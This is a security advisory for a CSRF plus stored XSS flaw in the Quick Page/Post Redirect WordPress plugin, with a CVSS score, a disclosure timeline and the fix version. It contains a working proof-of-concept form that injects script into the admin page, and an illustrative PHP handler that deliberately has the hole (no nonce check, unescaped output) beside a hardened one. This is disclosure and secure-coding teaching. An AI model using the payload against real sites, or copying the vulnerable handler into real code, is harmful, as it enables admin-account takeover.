Advisory:

CSRF and stored XSS in Quick Page/Post Redirect Plugin

Vulnerability

Last revised:

This plugin is vulnerable to a combined CSRF and stored XSS attack: if an admin user can be persuaded to visit a URL of the attacker’s choosing (via spear phishing, for instance), the attacker can store arbitrary JavaScript that runs in the plugin’s admin page. Once that occurs, the admin’s browser can be made to do almost anything the admin user could normally do, such as create or delete posts, create new admin users, or exploit vulnerabilities in other plugins.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability (CVSS v2 vector AV:N/AC:M/Au:N/C:P/I:P/A:P):

  Score:             6.8 (Medium)
  Access vector:     Network
  Access complexity: Medium
  Authentication:    None
  Confidentiality:   Partial
  Integrity:         Partial
  Availability:      Partial

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

The following form, hosted on an attacker-controlled page and submitted by (or auto-submitted on behalf of) a logged-in admin, introduces potentially malicious JavaScript. The plugin accepts the POST without a CSRF token and later renders the stored “request” value unescaped inside an HTML attribute, so the closing `">` in the value breaks out of the attribute and the script runs:

<form method="POST" action="http://localhost/wp-admin/admin.php?page=redirect-updates">
  <!-- Stored redirect source; the value closes the attribute and injects a script tag -->
  <input type="text" name="quickppr_redirects[request][]" value="&quot;>&lt;script>alert(1)&lt;/script>">
  <!-- Redirect destination (any URL will do) -->
  <input type="text" name="quickppr_redirects[destination][]" value="http://dxw.com/">
  <!-- Triggers the plugin's save handler -->
  <input type="text" name="submit_301" value="1">
  <input type="submit">
</form>
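To make the two defects and their fixes concrete, here is an added, illustrative WordPress settings handler. It is not the plugin’s own code: the function names, the option name `quickppr_redirects`, the nonce action `quickppr_save_redirects` and the nonce field `quickppr_nonce` are assumptions chosen to match the field names in the proof of concept. The first function reproduces the bug class (no nonce check, unescaped output); the second shows the hardened form using core WordPress APIs.

```php
<?php
// Added illustrative example, not code from the Quick Page/Post Redirect Plugin.
// Assumed: a handler on the plugin's admin page that reads the
// quickppr_redirects[request][] / [destination][] fields shown in the PoC.

// --- Vulnerable pattern (hypothetical reconstruction of the bug class) ---
function vulnerable_save_redirects() {
    if ( isset( $_POST['submit_301'] ) ) {
        // No nonce / referer check: any cross-site POST is accepted (CSRF).
        $requests     = (array) $_POST['quickppr_redirects']['request'];
        $destinations = (array) $_POST['quickppr_redirects']['destination'];
        update_option( 'quickppr_redirects', array_combine( $requests, $destinations ) );
    }
    $redirects = get_option( 'quickppr_redirects', array() );
    foreach ( $redirects as $request => $destination ) {
        // Stored value echoed straight into an attribute (stored XSS):
        // "><script>alert(1)</script> closes value="..." and injects a script.
        echo '<input type="text" name="quickppr_redirects[request][]" value="' . $request . '">';
        echo '<input type="text" name="quickppr_redirects[destination][]" value="' . $destination . '">';
    }
}

// --- Hardened pattern ---
function hardened_save_redirects() {
    if ( isset( $_POST['submit_301'] ) ) {
        // Only administrators may change redirects.
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_die( 'Insufficient privileges.' );
        }
        // CSRF: require a nonce bound to this action and the current user.
        // A form on the attacker's site cannot obtain one; on failure
        // check_admin_referer() calls wp_die().
        check_admin_referer( 'quickppr_save_redirects', 'quickppr_nonce' );

        $raw = isset( $_POST['quickppr_redirects'] ) ? wp_unslash( $_POST['quickppr_redirects'] ) : array();
        $requests     = array_map( 'sanitize_text_field', (array) ( $raw['request'] ?? array() ) );
        $destinations = array_map( 'esc_url_raw', (array) ( $raw['destination'] ?? array() ) );

        // array_combine() fails on mismatched lengths; reject rather than
        // store a half-parsed table.
        if ( count( $requests ) !== count( $destinations ) ) {
            wp_die( 'Malformed redirect table.' );
        }
        update_option( 'quickppr_redirects', array_combine( $requests, $destinations ) );
    }

    $redirects = get_option( 'quickppr_redirects', array() );
    echo '<form method="post">';
    // Emits the hidden nonce field the handler above verifies.
    wp_nonce_field( 'quickppr_save_redirects', 'quickppr_nonce' );
    foreach ( $redirects as $request => $destination ) {
        // XSS: escape on output. esc_attr() turns the PoC's "> into &quot;&gt;
        // so the value can no longer leave the attribute.
        echo '<input type="text" name="quickppr_redirects[request][]" value="' . esc_attr( $request ) . '">';
        echo '<input type="text" name="quickppr_redirects[destination][]" value="' . esc_attr( $destination ) . '">';
    }
    echo '<input type="submit" name="submit_301" value="Save">';
    echo '</form>';
}
```

Both controls are needed: the nonce stops the cross-site write, and output escaping stops any value that does reach the database (through a future bug, a compromised lower-privileged account, or a direct database edit) from executing in an admin’s browser. Input sanitisation with `sanitize_text_field()` / `esc_url_raw()` is defence in depth, not a substitute for escaping at the point of output.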

Advisory timeline

  • 2014-03-21: Discovered
  • 2014-03-24: Reported to plugins@wordpress.org
  • 2014-04-07: No response; requested an alternative email address using the author’s contact form.
  • 2014-04-08: Re-reported direct to author
  • 2014-04-08: Author responded, and publication agreed on or before 2014-05-06
  • 2014-04-10: Author reports issue fixed in version 5.0.5

Mitigation/further actions

Upgrade to version 5.0.5 or later.